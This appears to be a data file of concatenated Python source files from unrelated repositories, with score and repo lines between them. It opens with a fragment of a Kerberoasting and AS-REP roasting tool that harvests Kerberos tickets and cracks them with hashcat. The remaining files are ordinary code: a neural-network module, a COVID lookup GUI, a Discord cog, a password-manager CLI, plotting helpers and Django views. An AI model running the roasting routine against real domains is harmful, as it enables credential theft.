logging.getLogger().addHandler(debugHandler)
logger.setLevel(logging.DEBUG)
logger.debug(version.getInstallationPath())
else:
logger.setLevel(logging.INFO)
authDomain, username, password = parse_credentials(options.credentials)
db = Database(options.dbfile)
try:
logger.info("Authenticating with domain: "+authDomain)
logger.info("With username: "+username)
logger.info("Loading domains from file: "+options.domainsfile)
logger.info("Storing state in: "+options.dbfile)
if options.outputfile is not None:
options.outputfile = options.outputfile + "_" + datetime.datetime.now().strftime('%Y-%m-%d_%H-%M')
logger.info("Outputting results in: "+options.outputfile)
if not os.path.exists(options.dbfile):
logger.info("*** DATABASE NOT FOUND")
db.create_database()
logger.info("*** DATABASE CREATED")
else:
logger.info("*** DATABASE FOUND")
db.connect_database()
with open(options.domainsfile) as fi:
domains = [line.strip() for line in fi]
for targetDomain in domains:
logger.info(" ** Starting enumerating domain: "+targetDomain)
roaster = Roaster(username, password, authDomain, targetDomain, options)
# KERBEROAST
spnAnswers = roaster.harvesterSPNs()
tgsList = []
for spn in spnAnswers:
logger.debug("Found SPN: "+spn[0])
newSpn = db.find_spn(targetDomain, spn[0], spn[1], spn[3])
if newSpn:
tgsList.append(newSpn)
if len(tgsList)>0:
roaster.getTGS(tgsList)
if options.outputfile is not None:
logger.info(" ** Results written to: "+options.outputfile+".XX.krb5tgs, where XX is the encryption type id of the ticket.")
else:
logger.info(" ** No new or changed SPNs found for domain: "+targetDomain)
# ASREP ROAST
npAnswers = roaster.harvesterNPs()
npsList = []
for np in npAnswers:
logger.debug("Found NP with sAMAccountName: "+np[0])
npFound = db.find_np(targetDomain, np)
if not npFound:
npsList.append(np)
if len(npsList)>0:
usernames = [answer[0] for answer in npsList]
roaster.request_multiple_TGTs(usernames)
if options.outputfile is not None:
logger.info(" ** Results written to: "+options.outputfile+".XX.krb5asrep, where XX is the encryption type id of the ticket.")
else:
logger.info(" ** No new or changed NPUsers found for domain: "+targetDomain)
logger.info(" ** Finished enumerating domain: "+targetDomain)
logger.info("Finished all domains")
if options.crack is not None:
if os.path.exists(options.outputfile+".23.krb5tgs"):
logger.info("[KERBEROAST] Starting to crack RC4 TGS tickets using wordlist: "+options.crack)
subprocess.run(["hashcat","-m13100","-a0",options.outputfile+".23.krb5tgs",options.crack,"--force"]).stdout
if os.path.exists(options.outputfile+".17.krb5tgs"):
logger.info("[KERBEROAST] Starting to crack AES128 encrypted TGS tickets using wordlist: "+options.crack)
subprocess.run(["hashcat","-m19600","-a0",options.outputfile+".17.krb5tgs",options.crack,"--force"]).stdout
if os.path.exists(options.outputfile+".18.krb5tgs"):
logger.info("[KERBEROAST] Starting to crack AES256 encrypted TGS tickets using wordlist: "+options.crack)
subprocess.run(["hashcat","-m19700","-a0",options.outputfile+".18.krb5tgs",options.crack,"--force"]).stdout
if os.path.exists(options.outputfile+".23.krb5asrep"):
logger.info("[ASREP-ROAST] Starting to crack RC4 encrypted TGT tickets using wordlist: "+options.crack)
subprocess.run(["hashcat","-m18200","-a0",options.outputfile+".23.krb5asrep",options.crack,"--force"]).stdout
except Exception as e:
import traceback
traceback.print_exc()
| 1.851563
| 2
|
skssl/predefined/mlp.py
|
YannDubs/Semi-Supervised-Neural-Processes
| 5
|
12784834
|
import warnings
import torch.nn as nn
from skssl.utils.initialization import linear_init
from skssl.utils.torchextend import identity
__all__ = ["MLP", "get_uninitialized_mlp"]
def get_uninitialized_mlp(**kwargs):
return lambda *args, **kargs2: MLP(*args, **kwargs, **kargs2)
class MLP(nn.Module):
"""General MLP class.
Parameters
----------
input_size: int
output_size: int
hidden_size: int, optional
        Number of hidden neurons.
n_hidden_layers: int, optional
Number of hidden layers.
activation: torch.nn.modules.activation, optional
        Uninitialized activation class.
bias: bool, optional
        Whether to use biases in the hidden layers.
dropout: float, optional
Dropout rate.
"""
def __init__(self, input_size, output_size,
hidden_size=32,
n_hidden_layers=1,
activation=nn.ReLU,
bias=True,
dropout=0):
super().__init__()
self.input_size = input_size
self.output_size = output_size
self.hidden_size = hidden_size
self.n_hidden_layers = n_hidden_layers
if self.hidden_size < min(self.output_size, self.input_size):
self.hidden_size = min(self.output_size, self.input_size)
txt = "hidden_size={} smaller than output={} and input={}. Setting it to {}."
warnings.warn(txt.format(hidden_size, output_size, input_size, self.hidden_size))
self.dropout = (nn.Dropout(p=dropout) if dropout > 0 else identity)
        self.activation = activation()  # must be an activation class, not a function from torch.nn.functional
self.to_hidden = nn.Linear(self.input_size, self.hidden_size, bias=bias)
self.linears = nn.ModuleList([nn.Linear(self.hidden_size, self.hidden_size, bias=bias)
for _ in range(self.n_hidden_layers - 1)])
self.out = nn.Linear(self.hidden_size, self.output_size, bias=bias)
self.reset_parameters()
def forward(self, x):
out = self.to_hidden(x)
out = self.activation(out)
out = self.dropout(out)
for linear in self.linears:
out = linear(out)
out = self.activation(out)
out = self.dropout(out)
out = self.out(out)
return out
def reset_parameters(self):
linear_init(self.to_hidden, activation=self.activation)
for lin in self.linears:
linear_init(lin, activation=self.activation)
linear_init(self.out)
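# A minimal usage sketch (sizes and hyper-parameters below are illustrative only):
#
#   import torch
#   mlp = MLP(input_size=10, output_size=2, hidden_size=64, n_hidden_layers=2, dropout=0.1)
#   out = mlp(torch.randn(32, 10))  # -> tensor of shape (32, 2)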
| 2.640625
| 3
|
corona.py
|
yarinl3/Corona-Update
| 2
|
12784835
|
<gh_stars>1-10
import json
import requests
import tkinter as Tk
from tkinter import messagebox
from tkinter import simpledialog
from difflib import SequenceMatcher
import os
def similar(a, b):
return SequenceMatcher(None, a, b).ratio()
def main():
while True:
try:
try:
application_window.destroy()
except:
pass
application_window = Tk.Tk()
application_window.withdraw()
answer = simpledialog.askstring("Corona Update", "אנא הזן שם עיר או בחר מהרשימה:", parent=application_window)
if answer is None:
return None
url = 'https://data.gov.il/api/3/action/datastore_search?' \
'resource_id=8a21d39d-91e3-40db-aca1-f73f7ab1df69&sort=Date desc&limit=1&filters={"City_Name":\"' + answer + '\"}'
results = json.loads(requests.get(url).text)['result']['records'][0]
application_window.destroy()
break
except:
closest_city = ''
with open(r'cities.txt', 'r',encoding='utf8') as cities:
closest = 0
city = 'some string'
while city != '':
city = cities.readline().replace('\n', '')
similarity = similar(city, answer)
if similarity > closest:
closest = similarity
closest_city = city
messagebox.showinfo(f"שגיאה", f"שם עיר לא תקין\nאולי התכוונת ל: {closest_city}")
root = Tk.Tk()
f1 = Tk.Frame(root)
f2 = Tk.Frame(root)
root.wm_title('Corona Update')
root.resizable(width=False, height=False)
FONT = ('Arial', 20)
FONT2 = ('Arial', 16)
date = '/'.join(results['Date'].split('-')[::-1])
color = what_color(results['colour'])
Tk.Label(f2, text=":עיר", font=FONT).grid(row=0)
Tk.Label(f1, text=f"{results['City_Name']}", font=FONT).grid(row=0)
Tk.Label(f2, text=":צבע העיר", font=FONT).grid(row=1)
Tk.Label(f1, text=f"{results['colour']}", font=FONT, fg=color).grid(row=1)
Tk.Label(f2, text=":מספר החולה האחרון", font=FONT).grid(row=2)
Tk.Label(f1, text=f"{results['_id']}", font=FONT).grid(row=2)
Tk.Label(f2, text=":תאריך המקרה", font=FONT).grid(row=3)
Tk.Label(f1, text=f"{date}", font=FONT).grid(row=3)
Tk.Label(f2, text=":*חולים", font=FONT).grid(row=4)
Tk.Label(f1, text=f"{results['Cumulative_verified_cases']}", font=FONT).grid(row=4)
Tk.Label(f2, text=":*מחלימים", font=FONT).grid(row=5)
Tk.Label(f1, text=f"{results['Cumulated_recovered']}", font=FONT).grid(row=5)
Tk.Label(f2, text=":*מתים", font=FONT).grid(row=6)
Tk.Label(f1, text=f"{results['Cumulated_deaths']}", font=FONT).grid(row=6)
Tk.Label(f2, text=":*בדיקות", font=FONT).grid(row=7)
Tk.Label(f1, text=f"{results['Cumulated_number_of_tests']}", font=FONT).grid(row=7)
Tk.Label(f2, text=":תזמון עדכון יומי", font=FONT).grid(row=8)
f3 = Tk.Frame(f1, height='42')
hourstr = Tk.StringVar(root, '00')
minstr = Tk.StringVar(root, '00')
secstr = Tk.StringVar(root, '00')
Tk.Spinbox(f3, from_=00, to=23, wrap=True, textvariable=hourstr, width=3, state="readonly").place(in_=f3, anchor="c", relx=.2, rely=.5)
Tk.Label(f3, text=':', font=FONT2).place(in_=f3, anchor="c", relx=.35, rely=.5)
Tk.Spinbox(f3, from_=00, to=59, wrap=True, textvariable=minstr, width=3, state="readonly").place(in_=f3, anchor="c", relx=.5, rely=.5)
Tk.Label(f3, text=':', font=FONT2).place(in_=f3, anchor="c", relx=.65, rely=.5)
Tk.Spinbox(f3, from_=00, to=59, wrap=True, textvariable=secstr, width=3, state="readonly").place(in_=f3, anchor="c", relx=.8, rely=.5)
f3.grid(row=8, sticky="nsew")
Tk.Button(f1, text="תזמן", command=lambda: schedule(hourstr.get(), minstr.get(), secstr.get())).grid(row=10)
f4 = Tk.Frame(f2, height='50')
Tk.Label(f4, text="חישוב מצטבר *").pack(side="right")
Tk.Label(f4, font=FONT2).pack()
f4.grid(row=9, sticky="nsew")
f1.grid(row=0, column=0)
f2.grid(row=0, column=1)
Tk.mainloop()
def schedule(hours, minutes, seconds):
    schedule_time = f'{int(hours):02d}:{int(minutes):02d}:{int(seconds):02d}'
file_path = str(os.path.abspath(__file__))[:-2]+'exe'
os.system(f'SchTasks /Create /SC DAILY /TN "corona" /TR "{file_path}" /ST {schedule_time}')
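# For example, hours=7, minutes=5, seconds=0 expands the command above to roughly:
#   SchTasks /Create /SC DAILY /TN "corona" /TR "<path to this script>.exe" /ST 07:05:00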
def what_color(color):
try:
colors = {"ירוק": "green", "אדום": "red", "כתום": "orange", "צהוב": "yellow"}
label_color = colors[color]
except:
label_color = "black"
return label_color
if __name__ == "__main__":
main()
| 3.203125
| 3
|
cogs/preferences.py
|
MiningMark48/Tidal-Bot
| 6
|
12784836
|
from discord.ext import commands
from util.data.user_data import UserData
from util.decorators import delete_original
class Preferences(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.command(name="botdms", aliases=["botdm"])
@commands.cooldown(1, 2, commands.BucketType.user)
@delete_original()
async def dms(self, ctx, *, enabled: bool):
"""
Control whether or not the bot will DM you with certain commands/functions.
Example: Disabling DMs will prevent bot from DMing reactor role gives/takes.
Usage: botdms False
"""
result = UserData(str(ctx.author.id)).booleans.set("dm_enabled", enabled)
await ctx.send(f"{ctx.author.mention}, bot DMs have been **{'enabled' if result else 'disabled'}**.",
delete_after=10)
def setup(bot):
bot.add_cog(Preferences(bot))
| 2.390625
| 2
|
easy/swap_case.py
|
Amin-Abouee/code_eval
| 0
|
12784837
|
import sys
with open(sys.argv[1],'r') as test_cases:
for test in test_cases:
res = ''
for s in test:
if s.islower():
res += str(s.upper())
elif s.isupper():
res += str(s.lower())
else:
res += str(s)
print res,
| 3.59375
| 4
|
HumanRace/calc.py
|
InamdarAbid/PythonTutorial
| 1
|
12784838
|
<gh_stars>1-10
def human_age(age):
if age < 18:
return "Human is child"
elif age < 60:
return "Human is adult"
else:
return "Human is old."
def area(side):
are = side ** 2
return f'Area of square is {are}'
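# e.g. human_age(25) -> "Human is adult"; area(4) -> "Area of square is 16"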
| 3.625
| 4
|
run.py
|
fkinyae/passwordLocker
| 0
|
12784839
|
<gh_stars>0
#!/usr/bin/env python3.9
from credential import Credential
from user import User
def create_new_user(username, password):
'''
Function that creates a user
'''
new_user = User(username, password)
return new_user
def save_user(user):
'''
function to save user
'''
user.save_user()
def del_user(user):
'''
Function that deletes a user
'''
user.delete_user()
def user_login(username, password):
'''
check user authentication
'''
authentic_user = User.authenticate_user(username, password)
return authentic_user
def save_credential(credential):
'''
Function to save credential
'''
credential.save_credential()
def delete_credential(credential):
'''
Function to delete credential
'''
credential.delete_credential()
def find_a_credential(account):
'''
Function that searches for credentials
'''
return Credential.find_by_account(account)
def check_credential_existence(account):
'''
Function that checks the existence of a credential
'''
return Credential.find_credential(account)
def display_my_credentials():
'''
Function to display my credentials
'''
return Credential.display_credentials()
def generate_password():
'''
generates random passwords
'''
get_password = User.gen_password(8)
return get_password
def main():
password = None
print("Hi.. Welcome to Password Locker your modern passwords store! What is your name? ")
name = input()
print('\n')
while True:
print(f"Hello { name},\n Use the following short codes to perform your operation:\n CA - create a new user account, \n LG - login to your user account ")
short_code = input("").lower().strip()
if short_code == "ca":
print("Create An Account")
print('*' * 50)
username = input("Username: ")
while True:
print(" \n TP - To input your own password: \n GP - To get an autogenerated random password")
my_choice = input().lower().strip()
if my_choice == 'tp':
password = input("Enter Password\n")
break
elif my_choice == 'gp':
password = generate_password()
break
else:
print("We are sorry, that was an invalid choice, Try Again!")
save_user((create_new_user(username,password)))
print("*"*85)
print(f"Hello {name} , Your Account has been created successfully. Your password is: {password}")
print("*"*85)
elif short_code == "lg":
print("*"*50)
print("Enter your username and password to login")
print("*"*50)
username = input("Username: ")
password = input("password: ")
login = user_login(username, password)
            if login:
print(f"Hello {username}.Welcome To PassWord Locker Manager")
print('\n')
while True:
print("Use these shortcodes:\n CC - Create a new credential \n DC - Display Credentials \n FC - Find a credential \n GP - Generate a random password \n D-Delete credential \n EX - Exit the application")
short_code = input().lower().strip()
if short_code == "cc":
print("Create New Credential")
print("."*20)
print("Account Name: ")
account = input().lower()
print("Your account username")
username = input()
while True:
print(" \n TP - To input your own password: \n GP - To get an autogenerated random password")
the_choice = input().lower().strip()
if the_choice == 'tp':
password = input("Enter Your password\n")
break
elif the_choice == 'gp':
                                password = generate_password()
                                break
else:
print("Invalid entry, try again")
save_user((create_new_user(username,password)))
print('\n')
print(f"Account Credential for: {account} - UserName: {username} - Password:{password} created succesfully")
print('\n')
elif short_code == "dc":
if display_my_credentials():
print("Here is your list of accounts: ")
print("*"* 30)
print('_'*30)
for account in display_my_credentials():
print(f"Account:{account.account} \n Username:{username}\n Password:{password}")
print('_'* 30)
print('*' * 30)
else:
print("You don't have any credentials saved yet..........")
elif short_code == "fc":
print("Enter the Account name you want to search for ")
search_name = input().lower()
if find_a_credential(search_name):
search_credential = find_a_credential(search_name)
print(f"Account : {search_credential.account}")
print('-' * 50)
print(f"Username: {search_credential.username} Password :{search_credential.password}")
print('-' * 50)
else:
print("That Credential does not exist")
print('\n')
elif short_code == "d":
print("Enter the account name of the Credentials you want to delete")
cred_name = input().lower()
if find_a_credential(cred_name):
search_cred = find_a_credential(cred_name)
print("_"*50)
search_cred.delete_credential()
print('\n')
print(f"Your stored credentials for : {search_cred.account} successfully deleted!!!")
print('\n')
else:
print("That Credential you want to delete does not exist in your store yet")
elif short_code == 'gp':
password = generate_password()
print(f" {password} Has been generated succesfull. You can proceed to use it to your account")
elif short_code == 'ex':
print("Thanks for using passwords store manager.. See you next time!")
break
else:
print("Wrong entry... Check your entry again and let it match those in the menu")
else:
print("Please enter a valid input to continue")
if __name__ == '__main__':
main()
| 4.28125
| 4
|
plots.py
|
martinaviggiano/textsent_project
| 0
|
12784840
|
import plotly.graph_objects as go
from plotly.subplots import make_subplots
def plot_freq_labels(data, template="plotly"):
X = ["Non Hate Speech", "Hate Speech"]
Y = data["label"].value_counts().values
fig = go.Figure()
fig.add_trace(
go.Bar(
x=X,
y=Y,
text=Y,
textposition="auto",
marker_color=["lightblue", "royalblue"],
hovertemplate="Label: %{x} <br>Count: %{y}",
)
)
fig.update_layout(
title="Labels frequency",
xaxis_title="Labels",
yaxis_title="Counts",
template=template,
)
return fig
def plot_word_hist(data, template="plotly"):
fig = go.Figure()
fig.add_trace(
go.Histogram(
x=data.word_count_before.values,
marker_color="royalblue",
name="Before cleaning",
)
)
fig.add_trace(
go.Histogram(
x=data.word_count.values,
marker_color="lightblue",
name="After cleaning",
)
)
fig.update_layout(
title="Words distribution",
xaxis_title="Number of words",
yaxis_title="Number of sentences",
barmode="stack",
template=template,
)
fig.update_xaxes(range=[0, 50])
return fig
def plot_most_common_words(df, template="plotly"):
X = df.words
Y = df.freq
fig = go.Figure()
fig.add_trace(
go.Bar(
x=X,
y=Y,
hovertemplate="Word: %{x} <br>Count: %{y}",
marker_color="royalblue",
)
)
fig.update_layout(
title="Top 20 most common Words in the entire dataset ",
xaxis_title="Word",
yaxis_title="Count",
xaxis_tickangle=290,
template=template,
)
return fig
def plot_top_20_pos(df, x_col="", title="", template="plotly"):
fig = make_subplots(specs=[[{"secondary_y": True}]])
fig.add_trace(
go.Bar(
x=df[x_col],
y=df.Freq_No_Hate,
name="Freq. Not Hate Speech",
yaxis="y",
offsetgroup=1,
marker_color="lightblue",
),
secondary_y=False,
)
fig.add_trace(
go.Bar(
x=df[x_col],
y=df.Freq_Hate_Speech,
name="Freq. Hate Speech",
yaxis="y2",
offsetgroup=2,
marker_color="royalblue",
),
secondary_y=True,
)
fig.update_xaxes(title_text=x_col, tickangle = 290)
fig.update_yaxes(title_text="Count", secondary_y=False)
fig.update_layout(
title=title, template=template, yaxis2=dict(overlaying="y", side="right")
)
fig.update_layout(barmode="group")
return fig
def plot_top_pos_general(df, x_col=None, y_col=None, title="", template="plotly"):
fig = make_subplots(specs=[[{"secondary_y": True}]])
fig.add_trace(
go.Bar(
x=df[x_col[0]],
y=df[y_col[0]],
name=x_col[0],
yaxis="y",
offsetgroup=1,
marker_color="lightblue",
hovertemplate="<b>Total</b><br>POS: %{x} <br>Rel. freq.: %{y}",
),
secondary_y=False,
)
fig.add_trace(
go.Bar(
x=df[x_col[1]],
y=df[y_col[1]],
name=x_col[1],
yaxis="y2",
offsetgroup=2,
marker_color="royalblue",
hovertemplate="<b>Hate Speech</b><br>POS: %{x} <br>Rel. freq.: %{y}",
),
secondary_y=True,
)
fig.update_xaxes(title_text="POS", tickangle=290)
fig.update_yaxes(title_text="Relative Frequency", secondary_y=False)
fig.update_layout(
title=title, template=template, yaxis2=dict(overlaying="y", side="right")
)
fig.update_layout(barmode="group")
return fig
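# A minimal usage sketch (assuming a DataFrame ``data`` with a binary "label" column):
#
#   fig = plot_freq_labels(data)
#   fig.show()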
| 2.828125
| 3
|
src/Bubot/OcfResource/OcfResource.py
|
businka/bubot_Core
| 0
|
12784841
|
from Bubot.Helpers.ExtException import ExtException, KeyNotFound
from Bubot_CoAP.resources.resource import Resource
class OcfResource(Resource):
def __init__(self, name, coap_server=None, visible=True, observable=True, allow_children=True):
        super().__init__(name, coap_server=coap_server, visible=visible, observable=observable, allow_children=allow_children)
self._data = {}
self._href = name
self.actual_content_type = "application/vnd.ocf+cbor"
self.content_type = "application/vnd.ocf+cbor"
self.device = None
pass
@classmethod
def init_from_config(cls, device, href, config):
self = cls(href)
self.device = device
self.data = config
return self
@property
def data(self):
return self._data
@data.setter
def data(self, value):
self._data = value
@property
def payload(self):
return self._data
# @payload.setter
# def payload(self, value):
# self._data = value
def get_attr(self, *args):
try:
return self.data[args[0]]
except KeyError:
try:
return args[1]
except IndexError:
raise KeyNotFound(
action='OcfDevice.get_param',
detail=f'{args[0]} ({self.__class__.__name__}{self._href})'
) from None
def set_attr(self, name, value):
self.data[name] = value
@property
def resource_type(self):
return self._data.get('rt', [])
@property
def interface_type(self):
return self._data.get('if', [])
def get_link(self, request_address):
return {
'anchor': f'ocf://{self.device.get_device_id()}',
'href': self._href,
'eps': self.device.transport_layer.get_eps(request_address[0] if request_address else None),
'rt': self.get_attr('rt', []),
'if': self.get_attr('if', []),
'n': self.get_attr('n', ''),
'p': self.get_attr('p', dict(bm=0)),
}
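    # A link entry produced above looks roughly like (values are illustrative):
    #   {'anchor': 'ocf://<device-id>', 'href': '/oic/d', 'eps': [...],
    #    'rt': [...], 'if': [...], 'n': '', 'p': {'bm': 0}}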
async def render_GET(self, request):
self.device.log.debug(
f'{self.__class__.__name__} get {self._href} {request.query} from {request.source} to {request.destination} ')
return self
| 2.125
| 2
|
blog/views.py
|
pavanasri-nyros/blog-app-pavana
| 0
|
12784842
|
from django.shortcuts import render, get_object_or_404, redirect
from .models import Post
from django.views.generic import ListView, DetailView
from django.contrib.auth.forms import UserCreationForm, AuthenticationForm
from django.contrib.auth.models import User
from django.db import IntegrityError
from django.contrib.auth import login, logout, authenticate
from django.contrib.auth.decorators import login_required
from django.contrib.auth.mixins import LoginRequiredMixin
class HomePageView(ListView):
model = Post
template_name = 'home.html'
paginate_by = 4
class PostDetailView(LoginRequiredMixin, DetailView):
login_url = '/login/'
model = Post
template_name = 'post_detail.html'
def AboutPageView(request):
return render(request, 'about.html')
@login_required
def ContactPageView(request):
return render(request, 'contact.html')
def signupuser(request):
if request.method == 'GET':
return render(request, 'signupuser.html', {'form': UserCreationForm()})
else:
#create a new user
if request.POST['password1'] == request.POST['password2']:
try:
user = User.objects.create_user(request.POST['username'], password = request.POST['password1'])
user.save()
login(request, user)
return redirect('home')
except IntegrityError:
                return render(request, 'signupuser.html', {'form': UserCreationForm(), 'error': "That username has been taken. Please try another username"})
else:
            return render(request, 'signupuser.html', {'form': UserCreationForm(), 'error': 'Passwords did not match'})
def loginuser(request):
if request.method == 'GET':
return render(request, 'loginuser.html', {'form':AuthenticationForm()})
else:
user = authenticate(request,username = request.POST['username'],password = request.POST['password'])
if user is None:
            return render(request, 'loginuser.html', {'form': AuthenticationForm(), 'error': 'Username and password did not match'})
else:
login(request,user)
return redirect('home')
@login_required
def logoutuser(request):
if request.method == "POST":
logout(request)
return redirect('home')
| 2.34375
| 2
|
irspack/utils/id_mapping.py
|
Random1992/irspack
| 0
|
12784843
|
from typing import (
TYPE_CHECKING,
Any,
Dict,
Iterable,
List,
Optional,
Sequence,
Tuple,
Union,
)
import numpy as np
import scipy.sparse as sps
from irspack.definitions import DenseScoreArray, UserIndexArray
from irspack.utils._util_cpp import retrieve_recommend_from_score
from irspack.utils.threading import get_n_threads
if TYPE_CHECKING:
# We should move this module out of "utils".
from irspack.recommenders import BaseRecommender
class IDMappedRecommender:
"""A utility class that helps mapping user/item ids to index, retrieving recommendation score,
and making a recommendation.
Args:
recommender:
The backend base recommender which transforms user/item ids.
user_ids:
            user_ids which correspond to the rows of ``recommender.X_train_all``.
item_ids:
            item_ids which correspond to the columns of ``recommender.X_train_all``.
Raises:
ValueError: When recommender and user_ids/item_ids are inconsistent.
ValueError: When there is a duplicate in user_ids.
ValueError: When there is a duplicate in item_ids.
"""
def __init__(
self, recommender: "BaseRecommender", user_ids: List[Any], item_ids: List[Any]
):
if (recommender.n_users != len(user_ids)) or (
recommender.n_items != len(item_ids)
):
raise ValueError(
"The recommender and user/item ids have inconsistent lengths."
)
self.recommender = recommender
self.user_ids = user_ids
self.item_ids = item_ids
self.user_id_to_index = {user_id: i for i, user_id in enumerate(user_ids)}
self.item_id_to_index = {item_id: i for i, item_id in enumerate(item_ids)}
def _item_id_list_to_index_list(self, ids: Iterable[Any]) -> List[int]:
return [self.item_id_to_index[id] for id in ids if id in self.item_id_to_index]
def _user_profile_to_data_col(
self, profile: Union[List[Any], Dict[Any, float]]
) -> Tuple[List[float], List[int]]:
data: List[float]
cols: List[int]
# data: np.ndarray
if isinstance(profile, list):
cols = self._item_id_list_to_index_list(profile)
data = [1.0] * len(cols)
else:
data = []
cols = []
for id, score in profile.items():
if id in self.item_id_to_index:
data.append(score)
cols.append(self.item_id_to_index[id])
return data, cols
def _list_of_user_profile_to_matrix(
self, users_info: Sequence[Union[List[Any], Dict[Any, float]]]
) -> sps.csr_matrix:
data: List[float] = []
indptr: List[int] = [0]
col: List[int] = []
indptr_current = 0
for user_info in users_info:
data_u, col_u = self._user_profile_to_data_col(user_info)
data.extend(data_u)
col.extend(col_u)
indptr_current += len(col_u)
indptr.append(indptr_current)
result = sps.csr_matrix(
(data, col, indptr), shape=(len(users_info), len(self.item_ids))
)
return result
def get_recommendation_for_known_user_id(
self,
user_id: Any,
cutoff: int = 20,
allowed_item_ids: Optional[List[Any]] = None,
forbidden_item_ids: Optional[List[Any]] = None,
) -> List[Tuple[Any, float]]:
"""Retrieve recommendation result for a known user.
Args:
user_id:
The target user ID.
cutoff:
Maximal number of recommendations allowed.
allowed_item_ids:
If not ``None``, recommend the items within this list.
If ``None``, all known item ids can be recommended (except for those in ``item_ids`` argument).
Defaults to ``None``.
forbidden_item_ids:
If not ``None``, never recommend the items within the list. Defaults to None.
Raises:
RuntimeError: When user_id is not in ``self.user_ids``.
Returns:
A List of tuples consisting of ``(item_id, score)``.
"""
if user_id not in self.user_ids:
raise RuntimeError(f"User with user_id {user_id} not found.")
user_index: UserIndexArray = np.asarray(
[self.user_id_to_index[user_id]], dtype=np.int64
)
score = self.recommender.get_score_remove_seen(user_index)[0, :]
return self._score_to_recommended_items(
score,
cutoff=cutoff,
allowed_item_ids=allowed_item_ids,
forbidden_item_ids=forbidden_item_ids,
)
def get_recommendation_for_new_user(
self,
user_profile: Union[List[Any], Dict[Any, float]],
cutoff: int = 20,
allowed_item_ids: Optional[List[Any]] = None,
forbidden_item_ids: Optional[List[Any]] = None,
) -> List[Tuple[Any, float]]:
"""Retrieve recommendation result for a previously unseen user using item ids with which he or she interacted.
Args:
user_profile:
                User's profile, given either as a list of item ids the user has interacted with or an item id-rating dict.
Previously unseen item ID will be ignored.
cutoff:
Maximal number of recommendations allowed.
allowed_item_ids:
If not ``None``, recommend the items within this list.
If ``None``, all known item ids can be recommended (except for those in ``item_ids`` argument).
Defaults to ``None``.
forbidden_item_ids:
If not ``None``, never recommend the items within the list. Defaults to None.
Returns:
A List of tuples consisting of ``(item_id, score)``.
"""
data, cols = self._user_profile_to_data_col(user_profile)
X_input = sps.csr_matrix(
(data, cols, [0, len(cols)]), shape=(1, len(self.item_ids))
)
score = self.recommender.get_score_cold_user_remove_seen(X_input)[0]
return self._score_to_recommended_items(
score,
cutoff,
allowed_item_ids=allowed_item_ids,
forbidden_item_ids=forbidden_item_ids,
)
def get_recommendation_for_new_user_batch(
self,
user_profiles: Sequence[Union[List[Any], Dict[Any, float]]],
cutoff: int = 20,
allowed_item_ids: Optional[List[List[Any]]] = None,
forbidden_item_ids: Optional[List[List[Any]]] = None,
n_threads: Optional[int] = None,
) -> List[List[Tuple[Any, float]]]:
"""Retrieve recommendation result for a previously unseen users using item ids with which they have interacted.
Args:
user_profiles:
A list of user profiles.
                Each profile should be either a list of item ids the user has interacted with, or an item id-rating dict.
Previously unseen item IDs will be ignored.
cutoff:
Maximal number of recommendations allowed.
            allowed_item_ids:
                If not ``None``, defines a list of lists of recommendable item IDs,
                and ``len(allowed_item_ids)`` must be equal to ``len(user_profiles)``.
                Defaults to ``None``.
            forbidden_item_ids:
                If not ``None``, defines a list of lists of forbidden item IDs,
                and ``len(forbidden_item_ids)`` must be equal to ``len(user_profiles)``.
                Defaults to ``None``.
Returns:
A list of list of tuples consisting of ``(item_id, score)``.
Each internal list corresponds to the recommender's recommendation output.
"""
X_input = self._list_of_user_profile_to_matrix(user_profiles)
score = self.recommender.get_score_cold_user_remove_seen(X_input)
return self._score_to_recommended_items_batch(
score,
cutoff,
allowed_item_ids=allowed_item_ids,
forbidden_item_ids=forbidden_item_ids,
n_threads=get_n_threads(n_threads=n_threads),
)
def _score_to_recommended_items(
self,
score: DenseScoreArray,
cutoff: int,
allowed_item_ids: Optional[List[Any]] = None,
forbidden_item_ids: Optional[List[Any]] = None,
) -> List[Tuple[Any, float]]:
if allowed_item_ids is not None:
allowed_item_indices = np.asarray(
self._item_id_list_to_index_list(allowed_item_ids), dtype=np.int64
)
high_score_inds = allowed_item_indices[
score[allowed_item_indices].argsort()[::-1]
]
else:
high_score_inds = score.argsort()[::-1]
recommendations: List[Tuple[Any, float]] = []
for i in high_score_inds:
i_int = int(i)
score_this = score[i_int]
item_id = self.item_ids[i_int]
if np.isinf(score_this):
continue
if forbidden_item_ids is not None:
if item_id in forbidden_item_ids:
continue
recommendations.append((item_id, float(score_this)))
if len(recommendations) >= cutoff:
break
return recommendations
def _score_to_recommended_items_batch(
self,
score: DenseScoreArray,
cutoff: int,
allowed_item_ids: Optional[List[List[Any]]] = None,
forbidden_item_ids: Optional[List[List[Any]]] = None,
n_threads: int = 1,
) -> List[List[Tuple[Any, float]]]:
if forbidden_item_ids is not None:
assert len(forbidden_item_ids) == score.shape[0]
if allowed_item_ids is not None:
assert len(allowed_item_ids) == score.shape[0]
allowed_item_indices: List[List[int]] = []
if allowed_item_ids is not None:
allowed_item_indices = [
self._item_id_list_to_index_list(_) for _ in allowed_item_ids
]
if forbidden_item_ids is not None:
for u, forbidden_ids_per_user in enumerate(forbidden_item_ids):
score[
u, self._item_id_list_to_index_list(forbidden_ids_per_user)
] = -np.inf
raw_result = retrieve_recommend_from_score(
score,
allowed_item_indices,
cutoff,
n_threads=n_threads,
)
return [
[
(self.item_ids[item_index], score)
for item_index, score in user_wise_raw_result
]
for user_wise_raw_result in raw_result
]
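# A minimal usage sketch (the recommender itself is assumed to be any trained
# BaseRecommender whose matrix rows/columns match the id lists):
#
#   mapped = IDMappedRecommender(recommender, user_ids=["u1", "u2"], item_ids=["i1", "i2", "i3"])
#   mapped.get_recommendation_for_known_user_id("u1", cutoff=2)
#   mapped.get_recommendation_for_new_user({"i1": 5.0, "i3": 1.0}, cutoff=2)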
| 2.109375
| 2
|
src/pyrin/security/session/component.py
|
wilsonGmn/pyrin
| 0
|
12784844
|
# -*- coding: utf-8 -*-
"""
session component module.
"""
from pyrin.application.decorators import component
from pyrin.security.session import SessionPackage
from pyrin.security.session.manager import SessionManager
from pyrin.application.structs import Component
@component(SessionPackage.COMPONENT_NAME)
class SessionComponent(Component, SessionManager):
"""
session component class.
"""
pass
| 1.71875
| 2
|
preprocessing.py
|
AsgerAndersen/ByOurOwnDevices
| 0
|
12784845
|
<gh_stars>0
#!/usr/bin/env python
# coding: utf-8
# ## Load libraries
# In[3]:
import os
projpath = 'H:/workdata/705805/'
os.chdir(projpath)
# In[4]:
import pandas as pd
import numpy as np
from datetime import datetime as dt
import cns
# ## Global parameters
# In[5]:
timebin_len = 900
